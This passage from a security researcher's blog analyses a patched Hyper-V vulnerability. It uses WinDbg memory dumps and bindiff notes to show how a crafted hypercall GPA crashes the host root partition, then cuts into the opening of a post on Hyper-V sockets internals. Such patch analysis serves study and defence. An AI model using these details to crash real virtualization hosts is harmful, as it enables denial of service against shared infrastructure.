<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600010 f000eef3 f000ff54 f00000bf f0000067</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600020 f000fea5 f000e987 f000eef3 f000eef3</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600030 f000eef3 f000eef3 f000ef57 f000ff53</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600040 c8001148 f000f84d f000f841 f0001558</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600050 f000e739 f000f859 f000e82e f000860e</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600060 f000e000 f000e6f2 f000fe6e f000ff53</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600070 f000ff53 f000f0a4 f000efc7 c0002ff5</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc 0x20000000-60 L18 – last guest OS physical page (512 MB RAM)</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffa0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffb0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffc0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffd0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffe0 5446534d 32304d56 00000000 00000000 MSFTVM02........</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1ffffff0 00ff48ea 2f3530f0 312f3332 00fc0032 .H...05/23/12...</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd ffffc80000000000+(0x20000-1)*8 – last table element in hypervisor (point to last physical page in guest OS).</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc800`000ffff8 405ff077 80000000 00000000 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!dc 80000000405ff000+0xFD0 - hypervisor</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#80000000405fffd0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#80000000405fffe0 5446534d 32304d56 00000000 00000000 MSFTVM02........</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#80000000405ffff0 00ff48ea 2f3530f0 312f3332 00fc0032 .H...05/23/12...</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can see, that address 0xffffc80000000000 is not changed after reboot (as many addresses of hypervisor structures. Generally, Hyper-V has bad address space randomization).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See in details what happened when hypercall 0x57 was called for </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> = 200000000000h</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Test r15, r15 returns false:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="119" src="https://lh4.googleusercontent.com/rtm0bEsxHxgOu0ZTVYITFC3jmnZKUwRsaKh5gmi9CSTT6m7915lFMfQfAMhzeOdgblFOboz2qZYsxqR3SBOLNB0kx1DnK-rp9J-sW2P_15BUbfX9JzCr0OrZDw22nFiG_nwpAgnjztZJs4CmdQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to this code (r11b was zeroed and there is </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> in rsi):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="172" src="https://lh4.googleusercontent.com/PK7szWW1A0tKfMP-C2vOki3IbinVxqoLU7KTygqjL7UDuQ5JQPrWOcNkHInormx8CyvQU8w_ntab6XiuCkU7WTJCvYhCqCCP06xoBF-6H-FOeIN3DMcdY_7m9cKyFtpsPMqLfjhKHp1wDHCAuA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="298" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">R10 contains pointer to some structure (we call it struct1)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @r10</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859000 0000001b 00000003 00000001 00000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859010 00000000 00000000 00000000 00002000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859020 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859030 b585b000 00000080 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859040 00000000 00000000 b5802000 00000080</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859050 00000000 00000000 87000fe7 00000001</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859060 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859070 00000002 00000100 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hypercall is not called (ebx equals 1007h before jnz instruction)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="206" src="https://lh6.googleusercontent.com/nDXP3YM9vojBgcpHGDimZ6IbLOnnpdHU9VWPEmu_CT67YzCwnykKmqcDVm1F4Jwzt7Qm8ohKg4HiZP9rI-NN3lq4aaFM1Mli5ueZaZ1qxQKQR3iiIhpEeECVNNzMtcwS65UHf-R3-uI9oSW4TA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="505" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After mHandle64bVMCallMemory finished and we returned to mParse_VMEXIT:</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="141" src="https://lh5.googleusercontent.com/xk74zGNdRGIJwCA7X3TC8-eX5WT1SNvqrskvfsc_HJ_fD9h5WZ0LaP_QpuaQ16ZiPHDjz6cpRWAgNuDImWABp5UzZS37zMpEaq9-IY9NVD9gtzNeA9T8YEBU-JXyJfSPfuUZIi1Ut0ItUfHCuQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="515" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then go to mBSOD_L3</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="82" src="https://lh5.googleusercontent.com/omQjBltO0B2DTV_LtssJXksDVi2CRIT4WA3dZYcHKbbUql48gJL7yfQ4Bju8gY4H5QyBSwT8R4TZJeL_rMz9QwH_lQ63fqtbWBhP_1u8YEjaGQSbGz5Zg6zHOSFy-YfV2QdW1lylNhwfzgUMRw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="252" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Which analyses result of mHandle64bVMCallMemory</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="148" src="https://lh6.googleusercontent.com/Uii2Xa20I0zYAx6TI6FS-22Irb7TF6i6SScUJaVgXOHpraQ09fjk2O8U6bwOy2INmOTf7Og3LjKqoo6XyYPo3rPMxIHkj-spoA3o7xOAsonCQEA52nNUKhpBDDr4brjG_Mds3lchpVa5hf_k0A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="431" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If edx = 1b go to mBOSD_L2</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="153" src="https://lh6.googleusercontent.com/z2fgpO8HuelNWdQP87Wqi9hPINJ0hwXuaEp4wNuL6yRXhAZI9Ifcp68CUhMf6bMdtQrfV0QOnaIrAx5QFzOpPklyJTB8x5-Fa92e3pd1THP-WI0UwQWtYy8uoeJQppf4IsH-fIdDMLrSJZFRPA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="395" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Which checks some values of struct1</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="279" src="https://lh6.googleusercontent.com/rBPA26mGnlTHrk1SCe4OuVgVYrUfj13NHNRIYMY35pk1YATMOIeegR_kAAkgtk1ipwwtqnaFSbKdf0HU-RUvcm3X6iUPIAzoKI_ZfOTwm18ZdQtXYhVNI0CxcwunA3Fp6CH9FAqytYgI4fSCSg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="526" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I don’t see whether data with offset 110 was changed from mHandle64bVMCallMemory to mBSOD_L1.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See mBSOD_L1 if bindiff (patched hypervisor on left) – we see that check on 40 bit length (and above) was added. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="179" src="https://lh3.googleusercontent.com/fPxBvCmU5I7Gt8sFTop1NikrVa-Bh9jPg9zyjsP7yK1C23a0p5VxxY6vSQaT_V9K1Yqf-Yr5E93C-Irdi0GRucn1Nj2zlHqruUCntlPGMFXUX9C-2eFk22OeInINkHLv_v1NgOXRlEjVCwes9w" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next mBSOD_Handle64VmcallMemory is called, where SPA element, which points to GPA, is loaded. Index is (input_gpa shr 12)*8. If memory was not loaded we get exception 0xC0000005, which cause BSOD in root-partition.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We see only one part of vulnerability. BSOD is generated by function, which we didn’t consider in beginning, but without mHandle64VmcallMemory investigation it will be hard to reproduce vulnerability.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I use HvCreatePort hypercall for demonstrating BSOD, despite on guest OS doesn’t have permissions for execute it. But that permissions are checked on far stage hypercall’s handling after mVmcallHandlersTable was called, and it allow to get BSOD even on that hypercall.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Remote code execution was not demonstrated in this article, because I don’t find a way to do that. I believe that it is a theme for other investigation with class is “not for beginners.”</span></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-36234682529064408072017-09-10T12:40:00.002-07:002022-10-27T12:11:02.469-07:00Hyper-V sockets internals<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="margin-left: 355.85pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="97"></col></colgroup><tbody>
<tr style="height: 33pt;"><td style="padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Gerhart</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">@gerhart_x</span></div>
</td></tr>
</tbody></table>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 3.3000000000000007pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Root-partition (parent OS, root OS) — Windows Server 2016 with the installed Hyper-V;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 3.3000000000000007pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Guest OS (child partition, guest OS) — the virtual machine with Windows Server 2016 Gen2;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 3.3000000000000007pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V TLFS – Hyper-V Top level functional specification.</span></div>
</li>
</ul>
<br /><ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Intro</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2006. WinHec conference. Microsoft actively advances the own variant of a hypervisor (then it had no name yet, and it was designated just as “Windows hypervisor”) and even does hints on the fact, that developers will be able to create its own decisions on the basis of new virtualization technology:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
